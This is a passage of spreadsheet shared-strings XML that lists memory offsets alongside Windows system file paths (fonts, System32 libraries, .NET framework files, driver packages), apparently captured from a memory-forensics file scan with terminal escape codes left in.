    <t>0xdec52e88</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netman.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec531d8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mstape.inf_x86_neutral_b2cccf4ea41e4c0f\mstape.in</t>
  </si>
  <si>
    <t>0xdec53630</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v1.0.3705_b19cf3207984c497.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec54848</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmc26a.inf_x86_neutral_60a854d64d6e68bf\mdmc26a.</t>
  </si>
  <si>
    <t>0xdec54900</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_enterprisee_ff340ff929b60a6f.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xdec54ce8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_ultimate_da5870ccfb82b33b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec551d0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\vfwwdm32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec55450</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\uxtheme.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec55748</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_wsearchidxpi_0409_2e6e3e8caf9fcb6d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec55990</t>
  </si>
  <si>
    <t>0xdec55e80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dhcpcsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec56240</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcji.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec56420</t>
  </si>
  <si>
    <t>\Windows\Fonts\browab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec565f8</t>
  </si>
  <si>
    <t>\Windows\Fonts\browau.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec56bc8</t>
  </si>
  <si>
    <t>\Windows\Fonts\browaui.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec56c80</t>
  </si>
  <si>
    <t>\Windows\Fonts\angsauz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec56d38</t>
  </si>
  <si>
    <t>\Windows\Fonts\browai.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec56ec8</t>
  </si>
  <si>
    <t>\Windows\System32\nlaapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec57420</t>
  </si>
  <si>
    <t>\Windows\Fonts\browaub.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec574d8</t>
  </si>
  <si>
    <t>\Windows\Fonts\cordiaub.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec575f8</t>
  </si>
  <si>
    <t>\Windows\Fonts\cordiau.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec57c80</t>
  </si>
  <si>
    <t>\Windows\Fonts\browaz.ttf_x001B_[0K_x001B_[43G</t>
  </si>
  <si>
    <t>0xdec58130</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcfbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec583f0</t>
  </si>
  <si>
    <t>\ntsvcs_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec584a8</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcki.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec58560</t>
  </si>
  <si>
    <t>0xdec58c80</t>
  </si>
  <si>
    <t>\Windows\Fonts\browauz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec58d38</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcdl.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec59038</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcjl.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec59518</t>
  </si>
  <si>
    <t>0xdec59e58</t>
  </si>
  <si>
    <t>\scerpc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec59f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5a6b8</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcjbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5a770</t>
  </si>
  <si>
    <t>\Windows\Fonts\upckbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5aa80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5abe8</t>
  </si>
  <si>
    <t>0xdec5aca0</t>
  </si>
  <si>
    <t>0xdec5b3d0</t>
  </si>
  <si>
    <t>\Windows\System32\ubpm.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5b508</t>
  </si>
  <si>
    <t>0xdec5b5c0</t>
  </si>
  <si>
    <t>\Windows\Fonts\upckl.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5b7a0</t>
  </si>
  <si>
    <t>0xdec5bab8</t>
  </si>
  <si>
    <t>\Windows\Fonts\upckb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5cc28</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SystemCertificates\My_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5cce0</t>
  </si>
  <si>
    <t>0xdec5ce30</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.Abstractions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5d038</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcll.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5d2f8</t>
  </si>
  <si>
    <t>\Windows\System32\rdpwsx.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5df80</t>
  </si>
  <si>
    <t>\Windows\Fonts\upclb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5e038</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcli.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5e1d0</t>
  </si>
  <si>
    <t>0xdec5e348</t>
  </si>
  <si>
    <t>\Windows\System32\umpnpmgr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5e548</t>
  </si>
  <si>
    <t>\Windows\Fonts\upclbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5ec40</t>
  </si>
  <si>
    <t>0xdec5ed68</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\700c84fe895096e661f7a789dc9d</t>
  </si>
  <si>
    <t>46ed\Microsof</t>
  </si>
  <si>
    <t>t.Build.Eng</t>
  </si>
  <si>
    <t>ine.ni</t>
  </si>
  <si>
    <t>0xdec5ee48</t>
  </si>
  <si>
    <t>\Windows\Fonts\ariblk.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5ef80</t>
  </si>
  <si>
    <t>\Windows\System32\perfc009.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec5fec8</t>
  </si>
  <si>
    <t>\Windows\Fonts\kaiu.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec60038</t>
  </si>
  <si>
    <t>\Windows\System32\Tasks\Microsoft\Windows\Autochk\Proxy_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec60438</t>
  </si>
  <si>
    <t>\Windows\Fonts\l_10646.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec606a8</t>
  </si>
  <si>
    <t>\Windows\Fonts\calibriz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec60998</t>
  </si>
  <si>
    <t>\Windows\System32\spoolsv.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec61138</t>
  </si>
  <si>
    <t>0xdec614b8</t>
  </si>
  <si>
    <t>\Windows\System32\cryptnet.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec61570</t>
  </si>
  <si>
    <t>0xdec61628</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3124275_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec619e0</t>
  </si>
  <si>
    <t>\Windows\System32\oleaut32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec61df0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\mouclass.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec62378</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec62430</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec62630</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wpdcomp.inf_x86_neutral_c74d9db8cbb3545c\wpdcomp.</t>
  </si>
  <si>
    <t>0xdec62f80</t>
  </si>
  <si>
    <t>\Windows\System32\KernelBase.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec630d0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{167A81D6-0C2D-4C00-8FA</t>
  </si>
  <si>
    <t>D-385A644C341</t>
  </si>
  <si>
    <t>0xdec63248</t>
  </si>
  <si>
    <t>\Windows\System32\msi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec633e8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\System.Windows.Controls.Ribbon.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec635e8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec636a0</t>
  </si>
  <si>
    <t>\Windows\System32\ole32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec63aa8</t>
  </si>
  <si>
    <t>0xdec63d98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netprof.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec63eb8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\kscaptur.inf_x86_neutral_6cb3fb6811a3f83d\kscaptu</t>
  </si>
  <si>
    <t>0xdec640f0</t>
  </si>
  <si>
    <t>0xdec642a0</t>
  </si>
  <si>
    <t>\Windows\System32\wfapigp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec643f0</t>
  </si>
  <si>
    <t>\Windows\System32\cscsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec64580</t>
  </si>
  <si>
    <t>0xdec64900</t>
  </si>
  <si>
    <t>0xdec64b50</t>
  </si>
  <si>
    <t>0xdec64d58</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\NlsLexicons0009.dll_x001B_[0K</t>
  </si>
  <si>
    <t>_x001B_[0K_x001B_[84G</t>
  </si>
  <si>
    <t>0xdec65038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec65108</t>
  </si>
  <si>
    <t>\Windows\System32\advpack.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec65368</t>
  </si>
  <si>
    <t>\Windows\System32\shell32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec654d0</t>
  </si>
  <si>
    <t>\Windows\System32\diagtrack.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec65620</t>
  </si>
  <si>
    <t>\comctl32.d</t>
  </si>
  <si>
    <t>0xdec65858</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Web.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec65910</t>
  </si>
  <si>
    <t>0xdec65bd8</t>
  </si>
  <si>
    <t>0xdec65c90</t>
  </si>
  <si>
    <t>\Windows\System32\PeerDist.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec65d58</t>
  </si>
  <si>
    <t>0xdec65e10</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB3124275~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec65ec8</t>
  </si>
  <si>
    <t>0xdec65f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec661a8</t>
  </si>
  <si>
    <t>\Windows\System32\schedsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec662d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4486563_SP1~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec66388</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4054518_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec665b8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework-SystemXmlLinq.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec66720</t>
  </si>
  <si>
    <t>0xdec66870</t>
  </si>
  <si>
    <t>0xdec66a40</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework-SystemXml.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec66e20</t>
  </si>
  <si>
    <t>\Windows\System32\aepic.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec670f0</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygrunsrv.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec67648</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\qwave.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec67ce0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\UIAutomationClient.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec67e30</t>
  </si>
  <si>
    <t>0xdec67ee8</t>
  </si>
  <si>
    <t>0xdec68160</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\deskmon.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec687b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_homebasice_65b9eb47628f590b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec68ae0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgl002.inf_x86_neutral_e204d4267d752eb7\mdmgl00</t>
  </si>
  <si>
    <t>0xdec68b98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_enterprise_91ed40889f955d10.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec68f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_enterprisen_ff340eb529b60d48.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xdec69758</t>
  </si>
  <si>
    <t>0xdec69a50</t>
  </si>
  <si>
    <t>\Windows\Fonts\calibrii.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec69e10</t>
  </si>
  <si>
    <t>\Windows\Fonts\calibri.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6a198</t>
  </si>
  <si>
    <t>\Windows\Fonts\calibrib.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6ad38</t>
  </si>
  <si>
    <t>\Windows\System32\SPInf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6af80</t>
  </si>
  <si>
    <t>\Windows\System32\svchost.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6c038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\spoolsv.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6cf00</t>
  </si>
  <si>
    <t>0xdec6d670</t>
  </si>
  <si>
    <t>\Windows\Fonts\Candarai.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6de40</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.3.g</t>
  </si>
  <si>
    <t>thr_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6e278</t>
  </si>
  <si>
    <t>\Windows\Fonts\cambriai.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6e330</t>
  </si>
  <si>
    <t>\Windows\Fonts\cambriaz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6eb20</t>
  </si>
  <si>
    <t>\Windows\Fonts\Candara.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6ef80</t>
  </si>
  <si>
    <t>\plugplay_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6f038</t>
  </si>
  <si>
    <t>\Windows\Fonts\Candaraz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec6f9f0</t>
  </si>
  <si>
    <t>\Windows\Fonts\comicbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec70028</t>
  </si>
  <si>
    <t>\$ConvertToNonresident_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec70208</t>
  </si>
  <si>
    <t>\Windows\Fonts\Candarab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec706a8</t>
  </si>
  <si>
    <t>\Windows\Fonts\constani.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec70760</t>
  </si>
  <si>
    <t>\Windows\System32\pcwum.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec70880</t>
  </si>
  <si>
    <t>\Windows\Fonts\comic.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec70938</t>
  </si>
  <si>
    <t>\Windows\Fonts\consola.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec70c08</t>
  </si>
  <si>
    <t>\Windows\Fonts\constan.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec71310</t>
  </si>
  <si>
    <t>\Windows\Fonts\constanz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec714b0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Messaging\2.0.0.0__b03f5f7f11d50a3a\System.Messaging.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec71a70</t>
  </si>
  <si>
    <t>\Windows\System32\umpo.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec71b28</t>
  </si>
  <si>
    <t>\Windows\Fonts\consolai.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec71be0</t>
  </si>
  <si>
    <t>\Windows\Fonts\consolab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec71e30</t>
  </si>
  <si>
    <t>\Windows\Fonts\consolaz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec72188</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc10.inf_x86_neutral_2c5d0c618dbfaf2a\Ph3xIB</t>
  </si>
  <si>
    <t>C10.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec72570</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\auditpol.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec727a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_dvd_pcat_en-us_80af7686f451a150.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec72a40</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmaiwa3.inf_x86_neutral_836d7becdc26be7c\mdmaiwa</t>
  </si>
  <si>
    <t>0xdec72eb8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmti.inf_x86_neutral_dcb6f1180d313279\mdmti.inf_x001B_</t>
  </si>
  <si>
    <t>[0K_x001B_[116G</t>
  </si>
  <si>
    <t>0xdec739d0</t>
  </si>
  <si>
    <t>\Windows\System32\dwmredir.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec742f8</t>
  </si>
  <si>
    <t>temDrawing.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec74418</t>
  </si>
  <si>
    <t>temXmlLinq.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec74848</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_enterprisee_758c84c10065b5be.cdf-m</t>
  </si>
  <si>
    <t>0xdec749f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\atiriolh.inf_x86_neutral_cdb610d99bcbc631\atiriol</t>
  </si>
  <si>
    <t>0xdec74cd8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_205e682c4ad0fe50.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec74f80</t>
  </si>
  <si>
    <t>0xdec75038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wstorflt.inf_x86_neutral_3db956c41708f7f5\wstorfl</t>
  </si>
  <si>
    <t>0xdec75440</t>
  </si>
  <si>
    <t>0xdec75620</t>
  </si>
  <si>
    <t>0xdec75870</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\vbscript.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec75a20</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\tpm.inf_x86_neutral_56b145ccbfca752c\tpm.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec75eb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_pnrpsvc_0409_437342b1fe2eac8a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec763b8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelRegUI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec76638</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\en-US\ServiceModelRegUI.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec76930</t>
  </si>
  <si>
    <t>0xdec769e8</t>
  </si>
  <si>
    <t>0xdec76e80</t>
  </si>
  <si>
    <t>\BGinfo\BGCONFIG.BGI_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec77500</t>
  </si>
  <si>
    <t>0xdec777c8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.Services.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec77880</t>
  </si>
  <si>
    <t>0xdec77c00</t>
  </si>
  <si>
    <t>0xdec77ec8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Data.Services.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec77f80</t>
  </si>
  <si>
    <t>0xdec78038</t>
  </si>
  <si>
    <t>0xdec78650</t>
  </si>
  <si>
    <t>0xdec789e0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\System.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec78a98</t>
  </si>
  <si>
    <t>0xdec78e18</t>
  </si>
  <si>
    <t>0xdec78f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec79038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec791d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\1033\vbc7ui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec79648</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsecimpl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec79950</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\MUI\0409\mscorsecr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec79b38</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec79db8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7a038</t>
  </si>
  <si>
    <t>0xdec7a210</t>
  </si>
  <si>
    <t>\Windows\Fonts\Gabriola.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7a6a0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\Microsoft.T</t>
  </si>
  <si>
    <t>ransactions.B</t>
  </si>
  <si>
    <t>ridge.dll_x001B_[</t>
  </si>
  <si>
    <t>0xdec7a758</t>
  </si>
  <si>
    <t>\Windows\Fonts\palabi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7aaf0</t>
  </si>
  <si>
    <t>\Windows\Fonts\corbel.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7aba8</t>
  </si>
  <si>
    <t>\Windows\Fonts\constanb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7adf0</t>
  </si>
  <si>
    <t>0xdec7b338</t>
  </si>
  <si>
    <t>\Windows\System32\WSDMon.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7b3f0</t>
  </si>
  <si>
    <t>\Windows\Fonts\corbelz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7b4a8</t>
  </si>
  <si>
    <t>\Windows\Fonts\framdit.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7b6f0</t>
  </si>
  <si>
    <t>\Windows\Fonts\framd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7ba88</t>
  </si>
  <si>
    <t>0xdec7be10</t>
  </si>
  <si>
    <t>\Windows\Fonts\corbelb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7bf80</t>
  </si>
  <si>
    <t>\Windows\Fonts\corbeli.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7c268</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll</t>
  </si>
  <si>
    <t>0xdec7d248</t>
  </si>
  <si>
    <t>\Windows\Fonts\georgiaz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7d300</t>
  </si>
  <si>
    <t>\Windows\Fonts\palai.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7d3b8</t>
  </si>
  <si>
    <t>\Windows\Fonts\georgiai.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7d600</t>
  </si>
  <si>
    <t>\Windows\System32\spool\prtprocs\w32x86\winprint.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7d6b8</t>
  </si>
  <si>
    <t>\Windows\Fonts\georgiab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7db40</t>
  </si>
  <si>
    <t>\Windows\Fonts\georgia.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7e2d0</t>
  </si>
  <si>
    <t>\Windows\Fonts\segoepr.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7e388</t>
  </si>
  <si>
    <t>\Windows\Fonts\palab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7e820</t>
  </si>
  <si>
    <t>\Windows\System32\snmpapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7e990</t>
  </si>
  <si>
    <t>\Windows\Fonts\pala.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7ebe0</t>
  </si>
  <si>
    <t>0xdec7f6d8</t>
  </si>
  <si>
    <t>\Windows\Fonts\segoeprb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7f790</t>
  </si>
  <si>
    <t>\Windows\Fonts\trebuc.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec7fd78</t>
  </si>
  <si>
    <t>\Windows\Fonts\verdana.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec80268</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\snmptrap.exe.mui_x001B_[0K_x001B_[43G</t>
  </si>
  <si>
    <t>0xdec80320</t>
  </si>
  <si>
    <t>\Windows\Fonts\verdanaz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec805d8</t>
  </si>
  <si>
    <t>\Windows\Fonts\verdanai.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec80880</t>
  </si>
  <si>
